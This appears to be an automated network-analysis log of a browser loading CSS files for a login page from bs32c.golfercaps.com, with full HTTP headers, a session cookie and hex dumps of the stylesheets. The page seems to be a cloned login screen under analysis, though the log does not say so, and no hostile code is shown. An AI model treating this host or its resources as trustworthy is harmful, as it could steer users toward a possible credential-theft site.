                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:38 UTC879INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:38 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 586
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v16cIF2rxPtd8kFAut15JMDoNK3lM9n0H1GpGkUNFEXnyLuNs3e%2F5ZspY148l3M3jULTv%2BgDGDUwoEm7NBrUkbNahXBWnd%2FCzt%2FYPoM5lCIKN0Skl8fuT6U7dUKep42B5xoEa28uaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53351bfe9c42a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1670&rtt_var=835&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4208&recv_bytes=1938&delivery_rate=298263&cwnd=200&unsent_bytes=0&cid=17fb7f3e1027bf8a&ts=3689&x=0"
                                                                  2024-12-30 21:42:38 UTC490INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 6d 65 4c 6f 67 69 6e 5f 50 61 6e 65 6c 5f 62 72 6f 77 6e 5f 73 74 72 69 70 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 22 6d 65 4c 6f 67 69 6e 5f 64 69 61 67 6f 6e 61 6c 2e 70 6e 67 22 29 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 25 20 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 70 78 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7d 0a 2e 6d 65 4c 6f 67 69 6e 50 61 6e 65 6c 5f 62 6f 72 64 65 72 20 7b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7d 0a 2e 6d 65 4c 6f 67 69 6e 50 61 6e 65 6c 5f 74 61 62 6c 65 20 7b 20 76 65 72 74 69 63 61 6c 2d 61 6c
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.meLogin_Panel_brown_stripe { background: transparent url("meLogin_diagonal.png") repeat scroll 0% 0%; height: 10px; width: 100%; overflow: hidden; }.meLoginPanel_border { width: 100%; }.meLoginPanel_table { vertical-al
                                                                  2024-12-30 21:42:38 UTC96INData Raw: 6c 2c 47 65 6e 65 76 61 2c 68 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a
                                                                  Data Ascii: l,Geneva,helvetica,sans-serif; font-size: 15px; font-weight: bold; color: rgb(255, 255, 255); }


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.458503188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC1361OUTGET /vfd23ced/assets/meBubble.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:36 UTC883INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:36 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 1561
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCMdm80ciVZU4w%2BfeFnEVBINcPti1xA1GR8QrNWeRaoFSr94cPzaQrzjlSQsIVP6myGdQzG%2FrtynPZFQpPDB%2Be0TeCWY%2BS%2FAFQXRR5UHaZAff7JJUYQiLkr1eyTXxnABKiCl8mhXjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53351bf2342bc-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2331&min_rtt=1758&rtt_var=1805&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1939&delivery_rate=460277&cwnd=225&unsent_bytes=0&cid=2c25085767677f88&ts=2409&x=0"
                                                                  2024-12-30 21:42:36 UTC486INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 6d 65 42 75 62 62 6c 65 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 36 38 2c 20 36 38 2c 20 36 38 29 3b 20 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 33 70 78 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 33 70 78 20 72 67 62 28 31 36 30 2c 20 31 36 30 2c 20 31 36 30 29 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 77 69 64 74 68 3a 20 33 30 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 20 74 6f 70 3a 20 2d 34 30 70 78 3b 20 72
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.meBubble { color: rgb(68, 68, 68); border-image: none; border-style: solid; border-width: 3px; box-shadow: 4px 4px 3px rgb(160, 160, 160); line-height: 17px; position: absolute; width: 300px; padding: 10px; top: -40px; r
                                                                  2024-12-30 21:42:36 UTC1075INData Raw: 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 77 69 64 74 68 3a 20 30 70 78 3b 20 68 65 69 67 68 74 3a 20 30 70 78 3b 20 7d 0a 2e 6d 65 42 75 62 62 6c 65 50 6f 69 6e 74 65 72 49 6e 6e 65 72 20 7b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 32 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 2d 38 70 78 3b 20 77 69 64 74 68 3a 20 30 70 78 3b 20 68 65 69 67 68 74 3a 20 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 70 78 3b 20 7d 0a 2e 6d 65 42 75 62 62 6c 65 50 6f 69 6e 74 65 72 52 69 67 68 74 20 7b 20 72 69 67 68 74 3a 20 2d 32 70 78 3b 20 7d 0a 2e 6d 65 42 75 62 62 6c 65 50 6f 69 6e 74 65 72 52 69 67 68 74 20 2e 6d 65 42
                                                                  Data Ascii: ; position: absolute; width: 0px; height: 0px; }.meBubblePointerInner { border-style: solid; border-width: 12px; position: absolute; top: -8px; width: 0px; height: 0px; line-height: 0px; }.meBubblePointerRight { right: -2px; }.meBubblePointerRight .meB


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.458501188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC1354OUTGET /vfd23ced/assets/_.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:37 UTC881INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:37 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 8221
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jk06zdSNK8ERGJPSbUzjawLLOuLUmDcR8%2F6nsg837xJYzklmvzNBk%2FJ94W2HePh3hqR2CevQ6KEi2Z1vGHn56fy2VkW%2FOTLYwKvkvfsJuMyw%2BHwk9bqsjyTs6BlupNUfwp4t62uePQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53351bc320f98-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2209&min_rtt=1608&rtt_var=1806&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1932&delivery_rate=454616&cwnd=182&unsent_bytes=0&cid=b29d722954c75d86&ts=3375&x=0"
                                                                  2024-12-30 21:42:37 UTC488INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 6d 61 72 67 69 6e 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a 2e 62 75 74 74 6f 6e 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 30 34 2c 20 30 2c 20 30 29 3b 20 7d 0a 2e 66 69 6e 61 6c 62 75 74 74 6f 6e 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 31 35 33 2c 20 30 2c 20 30 29 3b 20 7d 0a 2e 6c 6f 67 69 6e 50 61 67 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 30 34 2c 20 30 29 3b 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 39 38 2c 20 39 35 2c 20 39 36 29 3b 20 7d 0a 2e 6c 6f 67 69 6e 50 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 20
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.margin { color: rgb(255, 255, 255); }.button { color: rgb(204, 0, 0); }.finalbutton { color: rgb(153, 0, 0); }.loginPage { background-color: rgb(255, 204, 0); border: 1px solid rgb(98, 95, 96); }.loginPageBackground
                                                                  2024-12-30 21:42:37 UTC1369INData Raw: 65 61 64 65 72 2e 6c 6f 67 69 6e 50 61 67 65 54 6f 70 42 61 72 20 7b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 39 38 2c 20 39 35 2c 20 39 36 29 3b 20 7d 0a 2e 6c 6f 67 69 6e 46 6f 72 6d 42 6f 78 43 6f 6c 6f 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 33 37 2c 20 32 33 38 2c 20 32 33 37 29 3b 20 7d 0a 2e 6c 6f 67 69 6e 46 6f 72 6d 43 65 6e 74 65 72 20 74 64 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 39 33 2c 20 39 37 2c 20 39 38 29 3b 20 7d 0a 2e 6c 6f 67 69 6e 46 6f 72 6d 46 6f 6e 74 73 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 39 33 2c 20 39 37 2c 20 39 38 29 3b 20 7d 0a 61 2e 6d 61 72 67 69 6e 4c 50 3a 61 63 74 69 76 65 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 39 33 2c
                                                                  Data Ascii: eader.loginPageTopBar { border-bottom: 1px solid rgb(98, 95, 96); }.loginFormBoxColor { background-color: rgb(237, 238, 237); }.loginFormCenter td { color: rgb(93, 97, 98); }.loginFormFonts { color: rgb(93, 97, 98); }a.marginLP:active { color: rgb(93,
                                                                  2024-12-30 21:42:37 UTC1369INData Raw: 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 41 2e 6d 61 72 67 69 6e 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 41 2e 6d 61 72 67 69 6e 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 41 2e 6d 61 72 67 69 6e 3a 68 6f 76 65 72 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 0a 41 2e 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 20 7b 20 63 6f 6c 6f 72
                                                                  Data Ascii: ecoration: none; }A.margin:link { color: rgb(255, 255, 255); text-decoration: none; }A.margin:visited { color: rgb(255, 255, 255); text-decoration: none; }A.margin:hover { color: rgb(255, 255, 255); text-decoration: underline; }A.button:active { color
                                                                  2024-12-30 21:42:37 UTC1369INData Raw: 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 7d 0a 2e 73 65 63 74 69 6f 6e 2d 63 6f 6c 6f 72 2d 74 65 78 74 2d 68 6f 76 65 72 61 62 6c 65 3a 68 6f 76 65 72 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a 2e 74 61 62 2d 2d 61 63 74 69 76 65 20 23 70 6c 75 73 5f 69 63 6f 6e 20 7b 20 66 69 6c 6c 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a 2e 6d 61 72 67 69 6e 63 6f 6c 6f 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 30 34 2c 20 30 2c 20 30 29 3b 20 7d 0a 2e 67 72 6f 75 70 48 65 61 64 65 72 2e 6d 61 72 67 69 6e 63 6f 6c 6f 72 20 2a 2c 20 2e 63 61 6c 65 6e 64 61 72 47 72 6f 75 70 48 65 61 64 65 72 2e 6d 61 72 67 69 6e 63 6f 6c 6f 72 20 2a 20 7b 20 63 6f
                                                                  Data Ascii: ight: normal; }.section-color-text-hoverable:hover { color: rgb(255, 255, 255); }.tab--active #plus_icon { fill: rgb(255, 255, 255); }.margincolor { background-color: rgb(204, 0, 0); }.groupHeader.margincolor *, .calendarGroupHeader.margincolor * { co
                                                                  2024-12-30 21:42:37 UTC1369INData Raw: 35 35 29 3b 20 7d 0a 54 52 2e 72 61 6e 6b 63 6f 6c 6f 72 62 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 34 36 2c 20 32 34 36 2c 20 32 34 36 29 3b 20 7d 0a 54 52 2e 72 61 6e 6b 63 6f 6c 6f 72 63 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 34 30 2c 20 32 34 30 2c 20 32 34 30 29 3b 20 7d 0a 2e 62 75 74 74 6f 6e 4e 6f 72 6d 61 6c 43 6f 6c 6f 72 2c 20 2e 62 75 74 74 6f 6e 2d 2d 63 6f 6c 6f 72 54 79 70 65 30 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 30 34 2c 20 30 2c 20 30 29 3b 20 7d 0a 2e 62 75 74 74 6f 6e 46 69 6e 61 6c 43 6f 6c 6f 72 2c 20 2e 62 75 74 74 6f 6e 2d 2d 63 6f 6c 6f 72 54 79 70 65 31 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                                                                  Data Ascii: 55); }TR.rankcolorb { background-color: rgb(246, 246, 246); }TR.rankcolorc { background-color: rgb(240, 240, 240); }.buttonNormalColor, .button--colorType0 { background-color: rgb(204, 0, 0); }.buttonFinalColor, .button--colorType1 { background-color:
                                                                  2024-12-30 21:42:37 UTC1369INData Raw: 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 20 21 20 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0a 2e 6c 65 66 74 42 75 73 69 6e 65 73 73 4d 65 6e 75 42 61 63 6b 67 72 6f 75 6e 64 20 7b 20 20 7d 0a 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 4c 69 6e 6b 20 7b 20 20 7d 0a 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 4c 69 6e 6b 41 72 72 6f 77 20 7b 20 20 7d 0a 2e 61 63 74 69 76 65 4d 65 6e 75 43 61 74 65 67 6f 72 79 20 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 4c 69 6e 6b 20 7b 20 20 7d 0a 2e 61 63 74 69 76 65 4d 65 6e 75 43 61 74 65 67 6f 72 79 20 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 4c 69 6e 6b 41 72 72 6f 77 20 7b 20 20 7d 0a 2e 68 69 67 68 6c 69 67 68 74 4d 65 6e 75 43 61 74 65 67 6f 72 79 20 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 4c 69 6e 6b 20 7b 20
                                                                  Data Ascii: { color: rgb(0, 0, 0) ! important; }.leftBusinessMenuBackground { }.menuCategoryLink { }.menuCategoryLinkArrow { }.activeMenuCategory .menuCategoryLink { }.activeMenuCategory .menuCategoryLinkArrow { }.highlightMenuCategory .menuCategoryLink {
                                                                  2024-12-30 21:42:37 UTC888INData Raw: 6c 6f 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 20 75 72 6c 28 22 62 67 2e 70 6e 67 22 29 20 72 65 70 65 61 74 2d 78 20 73 63 72 6f 6c 6c 20 30 70 78 20 30 70 78 3b 20 7d 0a 2e 6d 65 6e 75 4d 61 69 6e 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 62 61 72 3a 3a 62 65 66 6f 72 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 39 39 39 39 70 78 20 30 70 78 20 30 70 78 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a 2e 6d 65 6e 75 4d 61 69 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28
                                                                  Data Ascii: lor { background: white url("bg.png") repeat-x scroll 0px 0px; }.menuMain.full-width-bar::before { background-color: rgb(255, 255, 255); border-color: rgb(255, 255, 255); box-shadow: 9999px 0px 0px rgb(255, 255, 255); }.menuMain { background-color: rgb(


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.458500188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC1358OUTGET /vfd23ced/assets/login.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:35 UTC875INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:35 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 2639
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TU2dJ%2BHbhtN3HBfsdxa7opQnPYfvKjftXenEPTLK5lVjDUZ6v6wvEkxJMoMkkEqpZ8lZzhzYEVsmx6T5tBWxTzj35Rtr1py1zYuBCXy7dFvO83uJ3zlMUTD3PJxCUZkPWGygPa57qA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53351be0ac440-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1712&rtt_var=660&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1936&delivery_rate=1636771&cwnd=245&unsent_bytes=0&cid=939038d91b968877&ts=1398&x=0"
